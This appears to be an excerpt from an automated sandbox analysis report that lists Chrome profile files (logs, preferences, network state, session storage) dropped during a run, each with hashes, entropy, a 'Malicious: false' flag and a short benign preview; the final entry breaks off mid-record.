SHA-256:	DD2C9F43F622F801FCC213CDE8E3E90EF1D0D26665AE675449A94CEC7EB1D453
SHA-512:	84D3930579FD73C7D86144D5CDC636436955BA79759273C740D2D72BC4847F2F7F165BBCA3EB2E4DFB01777D6A5F141623278C1BF74615C5A491092CE3FD1602
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_versions":[],"expiration":"13248543677350473","port":443,"protocol_str":"quic"},{"advertised_versions":[],"expiration":"13248543677350474","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":31344},"server":"https://dns.google","supports_spdy":true},{"alternative_service":[{"advertised_versions":[],"expiration":"13248543501474403","port":443,"protocol_str":"quic"},{"advertised_versions":[],"expiration":"13248543501474403","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":31656},"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_versions":[],"expiration":"13248543501454993","port":443,"protocol_str":"quic"},{"advertised_versions":[],"expiration":"13248543501454994","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":39369},"server":"https://www.googleapis.com","supports_spdy":true},

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications\LOG Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	334
Entropy (8bit):	5.211503111505885
Encrypted:	false
SSDEEP:	6:mBPdxZq2PWXp+N23iKKdKgXz4rRIFUtAPddZmw2PdIhkwOWXp+N23iKKdKgXz4qG:uPhva5KkgXiuFUtAP//2Py5f5KkgX2J
MD5:	F6A5BCC002586274C58FFA304DD79C28
SHA1:	6705BCE9473F7BFA95B58A5F494D78AFEDC303D9
SHA-256:	0557A28A7FE5FA355ABDFB266AB4CFA923052BACAF98BCB9164EBBC2AE60EF66
SHA-512:	D9779327AFFDEA42D3F008BEEABAEB896B31FB57FA2C7305F383C07F72097F46E3DFF8489CBE06ED476D79F6C5DBB02C0D911AE41666F7F436965C5843F3B61A
Malicious:	false
Preview:	2021/12/06-19:08:50.101 1304 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications/MANIFEST-000001.2021/12/06-19:08:50.113 1304 Recovering log #3.2021/12/06-19:08:50.118 1304 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications\LOG.old (copy) Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	334
Entropy (8bit):	5.211503111505885
Encrypted:	false
SSDEEP:	6:mBPdxZq2PWXp+N23iKKdKgXz4rRIFUtAPddZmw2PdIhkwOWXp+N23iKKdKgXz4qG:uPhva5KkgXiuFUtAP//2Py5f5KkgX2J
MD5:	F6A5BCC002586274C58FFA304DD79C28
SHA1:	6705BCE9473F7BFA95B58A5F494D78AFEDC303D9
SHA-256:	0557A28A7FE5FA355ABDFB266AB4CFA923052BACAF98BCB9164EBBC2AE60EF66
SHA-512:	D9779327AFFDEA42D3F008BEEABAEB896B31FB57FA2C7305F383C07F72097F46E3DFF8489CBE06ED476D79F6C5DBB02C0D911AE41666F7F436965C5843F3B61A
Malicious:	false
Preview:	2021/12/06-19:08:50.101 1304 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications/MANIFEST-000001.2021/12/06-19:08:50.113 1304 Recovering log #3.2021/12/06-19:08:50.118 1304 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences (copy) Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	4844
Entropy (8bit):	4.9581664102636305
Encrypted:	false
SSDEEP:	48:YciUkPkTiHj5c39EqAOqqTlYqlQKHoTw0amH3CH3G/s8C1Nfct/9BhUJo3KhmeSz:n6A39pt9pcKI5ok0JCKL8VbOTQVuwn
MD5:	BD94BBEA2439066F1FD0EB66BE4E90A9
SHA1:	B7096CEBADC6D72C12556E4C0C5E1563AF45740C
SHA-256:	F44C94FA5D239A85AA654E870BB3787B5C7D66342F17F05BBD53F6703407E53C
SHA-512:	DB14EC4D83275FCAFB0CC5160C1CBFD618A37D01BC43F5CD8FC9B7ACEA5153954B61B91C7547F158BC82790AB2C5A913D1018F7396BDA0AFED23DFE73F5ACC8D
Malicious:	false
Preview:	{"account_id_migration_state":2,"account_tracker_service_last_update":"13283320129957883","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245951485614034","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"browser":{"has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":200,"left":0,"maximized":false,"right":516,"top":0,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","7355378"],"daily_received_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PreferencesMP (copy) Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	5467
Entropy (8bit):	5.186977647949688
Encrypted:	false
SSDEEP:	96:n6A3kpt9Uz0aScKI5ok0JCKL8ibOTQVuwn:n6xH9UwcO4Kf
MD5:	B5E0AF68004C8ABAFC6802C2DFC85C25
SHA1:	6FAB370712F0A7531781E74E3FC101BDF4C4387E
SHA-256:	5503C11BDC411307B4290160BE95B68192437F7B95D6F8A022366D476786BD37
SHA-512:	307878330359C8B528FD5674FB99D6F27E7A1478D86B42CAFC1C879BC2BD90C066BCB02138ED2A40D448906201CA92EFD2844DAEDD27C57B17D1B07D65C5ACD0
Malicious:	false
Preview:	{"account_id_migration_state":2,"account_tracker_service_last_update":"13283320129957883","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245951485614034","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"browser":{"has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":200,"left":0,"maximized":false,"right":516,"top":0,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","7355378"],"daily_received_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferencest\ (copy) Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	4871
Entropy (8bit):	4.96374295872605
Encrypted:	false
SSDEEP:	48:YciUkPkTiHj5c3WbEEqAOqqTlYqlQKHoTw0amH3CH3G/s8C1Nfct/9BhUJo3Khm8:n6A3/pt9pcKI5ok0JCKL8ibOTQVuwn
MD5:	8DBC99D2A9E830480F8803B2FC4402BC
SHA1:	84A99F5EB43D12F33D8FE0ACD0053C32721BA515
SHA-256:	489351082DA1973C3829B6DD02EC74D218A78C3450F55F0204963A46FCC6B6C0
SHA-512:	4799D3E8B3825D7DCEAFBCDCAF5C96EA2ED82C7D774BDB6380502809196C49A5535A4B52350BD51958ECD7B2FEF7666239F4D054E84008DDADC3AB486C1A675D
Malicious:	false
Preview:	{"account_id_migration_state":2,"account_tracker_service_last_update":"13283320129957883","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245951485614034","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"browser":{"has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":200,"left":0,"maximized":false,"right":516,"top":0,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","7355378"],"daily_received_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Reporting and NEL Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	0.6516396427405485
Encrypted:	false
SSDEEP:	48:TUIopK2rJNVr1GJmm8pF82phrJNVrdHX/cjrJN2yJ1n4n1GmhGU1cEBYoTRs2oTf:wIElwQF8mpcSasL2YK71
MD5:	1E11B9BB0E3E6F6E0159D2D66EC42FCF
SHA1:	DBBD61BB18B0A87EF4E4287CA43465D73DC1B5EF
SHA-256:	A6B31BC98806DAB32FC6E6E82A946E20860237BD424D2489A345A73DEAA787BA
SHA-512:	C68BF02FD15BD8F95B2230671137FB29DDE4FAE91052406B1D8E68E0C316052B0981B1F5F960CD50E19E75A593CF467D6924DA220A9376B81490CC07B7FD75CE
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C..........g...^.........j............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences (copy) Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	21244
Entropy (8bit):	5.552044581640642
Encrypted:	false
SSDEEP:	384:dWItTLlVjXi1kXqKf/pUZNCgVLH2HfD8rULHGqnTM6zvO4kyK:TLl9i1kXqKf/pUZNCgVLH2HfgrUbGqnI
MD5:	B040EF7F2EC00997C30F14B28FA73FDD
SHA1:	9F52CFCE8C275F9275DF204CCDC7C6642E5F576F
SHA-256:	853303EEAF0981B8AFF4388B6132F71D4043CE46B002D0564E18B5DE0CC0F730
SHA-512:	849D7BA46B176AB2F012E57A47B4D1E7E14682D49D0B1F160BFE35CAD594644793344713B6AD764A5C2B1363C6B462E01DC42F50AE5DB524F51478B9D88B7D13
Malicious:	false
Preview:	{"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13283320129404746","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_icon_128.png","16":"webstore_icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCtl3tO0osjuzRsf6xtD2SKxPlTfuoy7AWoObysitBPvH5fE1NaAA1/2JkPWkVDhdLBWLaIBPYeXbzlHp3y4Vv/4XG+aN5qFE3z+1RU/NqkzVYHtIpVScf3DjTYtKVL66mzVGijSoAIwbFCC3LpGdaoe6Q1rSRDp76wR6jjFzsYwQIDAQAB","name":"Web Store","pe

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure PreferencesE~ (copy) Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	15601
Entropy (8bit):	5.603196901480548
Encrypted:	false
SSDEEP:	384:dWItTLlVjXi1kXqKf/pUZNCgVLH2HfD8rUv6hO4B0:TLl9i1kXqKf/pUZNCgVLH2HfgrUvIOJ
MD5:	97ABBEFBFD124D80BB39B643FD4F2BE3
SHA1:	F40A5119D6272F27074A48BD3C4436B5985B7DC3
SHA-256:	626E68C4F0F13218D8EE29EB8F00668595D1D759313A0B714C3072BBEFE10FA2
SHA-512:	DFE0CD43908BEE905E89531BB1E7D3DA7BDE2A31CCA2FCFE401489A3F48034409631481F2C743ABA54CF719FA35C98C44410B6366866781E7942523FE66EA986
Malicious:	false
Preview:	{"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13283320129404746","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_icon_128.png","16":"webstore_icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCtl3tO0osjuzRsf6xtD2SKxPlTfuoy7AWoObysitBPvH5fE1NaAA1/2JkPWkVDhdLBWLaIBPYeXbzlHp3y4Vv/4XG+aN5qFE3z+1RU/NqkzVYHtIpVScf3DjTYtKVL66mzVGijSoAIwbFCC3LpGdaoe6Q1rSRDp76wR6jjFzsYwQIDAQAB","name":"Web Store","pe

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\000003.log Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	327
Entropy (8bit):	2.5384726236607107
Encrypted:	false
SSDEEP:	6:S85aEFljljljljljljljljljljljljljljl:S+a8ljljljljljljljljljljljljljlZ
MD5:	A66EFAA590A0D16B1874A35836BA0A4B
SHA1:	BB750C61E162420271F89A90F2B58F43587680E1
SHA-256:	B9AB1ED7609E2254B7D4FB655B57B21B2BE601646C4FF0B207C411E8BDD9E654
SHA-512:	2B1EA0C798B69B360AB1546D14FCCF7D5F9CB224B31BC8430CDB956C8CC570A086E4CFA10E6A843292DEB862F4161DFC9B9ABBC44AFE397FF0EC9563646FF7A5
Malicious:	false
Preview:	*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f...............

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	320
Entropy (8bit):	5.223136151744134
Encrypted:	false
SSDEEP:	6:mBPdZKQ+q2PWXp+N23iKKdKrQMxIFUtAPdZUgZmw2PdZUQVkwOWXp+N23iKKdKrb:uPeVva5KkCFUtAPAg/2PAI5f5KktJ
MD5:	CEB4BEDCB8FB5D50A771A7B9E5DA2D52
SHA1:	4611560351D21C6AB77569D468FACC94D6CACFBB
SHA-256:	4ED67066B88E536B57CD02CA4439984ABF2EDABF47FB358DE57324099CF5B653
SHA-512:	A17BC3AF37F6EADF640786F658A6F6180FE9012832A89666EC84A88A217AEC279C08FD77F75E5E855FEDA6FCC0ADC554A080AD5B40FC11D43D6681A13D3D7E29
Malicious:	false
Preview:	2021/12/06-19:08:49.907 1bf8 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage/MANIFEST-000001.2021/12/06-19:08:49.909 1bf8 Recovering log #3.2021/12/06-19:08:49.909 1bf8 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG.old (copy) Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	320
Entropy (8bit):	5.223136151744134
Encrypted:	false
SSDEEP:	6:mBPdZKQ+q2PWXp+N23iKKdKrQMxIFUtAPdZUgZmw2PdZUQVkwOWXp+N23iKKdKrb:uPeVva5KkCFUtAPAg/2PAI5f5KktJ
MD5:	CEB4BEDCB8FB5D50A771A7B9E5DA2D52
SHA1:	4611560351D21C6AB77569D468FACC94D6CACFBB
SHA-256:	4ED67066B88E536B57CD02CA4439984ABF2EDABF47FB358DE57324099CF5B653
SHA-512:	A17BC3AF37F6EADF640786F658A6F6180FE9012832A89666EC84A88A217AEC279C08FD77F75E5E855FEDA6FCC0ADC554A080AD5B40FC11D43D6681A13D3D7E29
Malicious:	false
Preview:	2021/12/06-19:08:49.907 1bf8 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage/MANIFEST-000001.2021/12/06-19:08:49.909 1bf8 Recovering log #3.2021/12/06-19:08:49.909 1bf8 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	348
Entropy (8bit):	5.193276576134978
Encrypted:	false
SSDEEP:	6:mBPdT3FN+q2PWXp+N23iKKdK7Uh2ghZIFUtAPdMyZZmw2PdHhVkwOWXp+N23iKKF:uPJ3FIva5KkIhHh2FUtAP6A/2P55f5KF
MD5:	485683A7B86CB42ADAB93B719E0A6D31
SHA1:	670BCC1B3574CA8EA852C2DC276802BB3711FFFD
SHA-256:	004D77977EB76FEA1A00A9F25A70361CE4414A083130794C620CF458BAC5508B
SHA-512:	4E94D8B7C10AB03BA5686C61622C4B0131CE16FE7FAF25F074BC2C8D66F3BAAA502459E5F212B0340D9410F6C4FF87C417F65EBA18557741AE0B4EF47AF9F7AD
Malicious:	false
Preview:	2021/12/06-19:08:49.399 1ab8 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database/MANIFEST-000001.2021/12/06-19:08:49.405 1ab8 Recovering log #3.2021/12/06-19:08:49.410 1ab8 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG.old (copy) Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	348
Entropy (8bit):	5.193276576134978
Encrypted:	false
SSDEEP:	6:mBPdT3FN+q2PWXp+N23iKKdK7Uh2ghZIFUtAPdMyZZmw2PdHhVkwOWXp+N23iKKF:uPJ3FIva5KkIhHh2FUtAP6A/2P55f5KF
MD5:	485683A7B86CB42ADAB93B719E0A6D31
SHA1:	670BCC1B3574CA8EA852C2DC276802BB3711FFFD
SHA-256:	004D77977EB76FEA1A00A9F25A70361CE4414A083130794C620CF458BAC5508B
SHA-512:	4E94D8B7C10AB03BA5686C61622C4B0131CE16FE7FAF25F074BC2C8D66F3BAAA502459E5F212B0340D9410F6C4FF87C417F65EBA18557741AE0B4EF47AF9F7AD
Malicious:	false
Preview:	2021/12/06-19:08:49.399 1ab8 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database/MANIFEST-000001.2021/12/06-19:08:49.405 1ab8 Recovering log #3.2021/12/06-19:08:49.410 1ab8 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\GPUCache\data_1 Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	0.0012471779557650352
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zE:/M/xT02z
MD5:	F50F89A0A91564D0B8A211F8921AA7DE
SHA1:	112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
SHA-256:	B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
SHA-512:	BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Local Storage\leveldb\LOG Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	430
Entropy (8bit):	5.287983506788667
Encrypted:	false
SSDEEP:	6:mBPdZ9q2PWXp+N23iKKdKusNpV/2jMGIFUtAPdZS9Zmw2PdZSPkwOWXp+N23iKKZ:uPxva5KkFFUtAPG9/2PGP5f5KkOJ
MD5:	1D76076185D919F0CB58557EAB8E4502
SHA1:	5402CB098BCE46550C2B0C1E5B35422A48C54696
SHA-256:	1A82E775149E1B5BA8CE0D5DEA84662CB6D01B01AE3FB688B27120BB88F36F48
SHA-512:	9D8A29B964147281581D4B1C3BA9813E3578526FB3CAE04EE20429A8BFBC81DC37C3FCBC38F5D20689138D21E46E144B23A502CA1E663526DAF97DFE34C82697
Malicious:	false
Preview:	2021/12/06-19:08:49.971 1b04 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Local Storage\leveldb/MANIFEST-000001.2021/12/06-19:08:49.973 1b04 Recovering log #3.2021/12/06-19:08:49.973 1b04 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Local Storage\leveldb\LOG.old (copy) Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	430
Entropy (8bit):	5.287983506788667
Encrypted:	false
SSDEEP:	6:mBPdZ9q2PWXp+N23iKKdKusNpV/2jMGIFUtAPdZS9Zmw2PdZSPkwOWXp+N23iKKZ:uPxva5KkFFUtAPG9/2PGP5f5KkOJ
MD5:	1D76076185D919F0CB58557EAB8E4502
SHA1:	5402CB098BCE46550C2B0C1E5B35422A48C54696
SHA-256:	1A82E775149E1B5BA8CE0D5DEA84662CB6D01B01AE3FB688B27120BB88F36F48
SHA-512:	9D8A29B964147281581D4B1C3BA9813E3578526FB3CAE04EE20429A8BFBC81DC37C3FCBC38F5D20689138D21E46E144B23A502CA1E663526DAF97DFE34C82697
Malicious:	false
Preview:	2021/12/06-19:08:49.971 1b04 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Local Storage\leveldb/MANIFEST-000001.2021/12/06-19:08:49.973 1b04 Recovering log #3.2021/12/06-19:08:49.973 1b04 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Network Persistent State (copy) Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	420
Entropy (8bit):	4.985305467053914
Encrypted:	false
SSDEEP:	6:YHpoNXR8+eq7JdV5qQlsDHF4xj70PpqQEsDHF4R8HLJ2AVQBR70S7PMVKJw1K3Ky:YHO8sdBsB6MAsBdLJlyH7E4f3K33y
MD5:	C401B619D9D8E0ADABC25A47EE49CFBA
SHA1:	C9D3B816DD3FBCD98E9C0A32CEC7B501EFC0BBDA
SHA-256:	8F5D75F5EF9876E8D30CE477509F735B50C4D87DBEDB433BE8EDBE6D4B3CB82F
SHA-512:	BC12F16CB95CB0AD708C6BBD005EF863A8552613E612F1084086E0F8262752E1B5144D044F0D141CE8462CC33343C36B517A5CC778751680485D8F88FB51B862
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_versions":[50],"expiration":"13248543490879170","port":443,"protocol_str":"quic"},{"advertised_versions":[73],"expiration":"13248543490879171","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://dns.google","supports_spdy":true}],"version":5},"network_qualities":{"CAASABiAgICA+P////8B":"4G","CAESABiAgICA+P////8B":"4G"}}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Platform Notifications\LOG Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	432
Entropy (8bit):	5.263005348999731
Encrypted:	false
SSDEEP:	12:uPaN+va5KkmiuFUtAP5Y/2PJNV5f5Kkm2J:mra5KkSgMvJlf5Kkr
MD5:	457B3BEEFF08B762771070F7CD284E0E
SHA1:	2F6165FCCD7250B688671CD987789503B9DFF609
SHA-256:	A1D3954108A97CDE0B6A10DE2D7DA06C8122E56F434F8D2E5A7DD0EA9F49223F
SHA-512:	D8AD264D9B18F9D919B11E52F6CE2D53C9EB3847B7543B001810857454F3DFB27E2D695B3CAA2A8FDBCEE427C6603B8F2568DD5C72952BD366B21912970CFFE3
Malicious:	false
Preview:	2021/12/06-19:08:50.080 1b0c Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Platform Notifications/MANIFEST-000001.2021/12/06-19:08:50.084 1b0c Recovering log #3.2021/12/06-19:08:50.102 1b0c Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Platform Notifications/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Platform Notifications\LOG.old (copy) Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	432
Entropy (8bit):	5.263005348999731
Encrypted:	false
SSDEEP:	12:uPaN+va5KkmiuFUtAP5Y/2PJNV5f5Kkm2J:mra5KkSgMvJlf5Kkr
MD5:	457B3BEEFF08B762771070F7CD284E0E
SHA1:	2F6165FCCD7250B688671CD987789503B9DFF609
SHA-256:	A1D3954108A97CDE0B6A10DE2D7DA06C8122E56F434F8D2E5A7DD0EA9F49223F
SHA-512:	D8AD264D9B18F9D919B11E52F6CE2D53C9EB3847B7543B001810857454F3DFB27E2D695B3CAA2A8FDBCEE427C6603B8F2568DD5C72952BD366B21912970CFFE3
Malicious:	false
Preview:	2021/12/06-19:08:50.080 1b0c Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Platform Notifications/MANIFEST-000001.2021/12/06-19:08:50.084 1b0c Recovering log #3.2021/12/06-19:08:50.102 1b0c Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Platform Notifications/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage\000003.log Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	80
Entropy (8bit):	3.4921535629071894
Encrypted:	false
SSDEEP:	3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
MD5:	69449520FD9C139C534E2970342C6BD8
SHA1:	230FE369A09DEF748F8CC23AD70FD19ED8D1B885
SHA-256:	3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
SHA-512:	EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
Malicious:	false
Preview:	*...#................version.1..namespace-..&f.................&f...............

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage\LOG Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	418
Entropy (8bit):	5.232752831339721
Encrypted:	false
SSDEEP:	6:mBPvE+q2PWXp+N23iKKdKusNpZQMxIFUtAPvlFWZmw2PvVb3VkwOWXp+N23iKKd0:uPvE+va5KkMFUtAPvW/2PvF3V5f5KkTJ
MD5:	B49BA3490E0D8189CBE7C85BFC187BD9
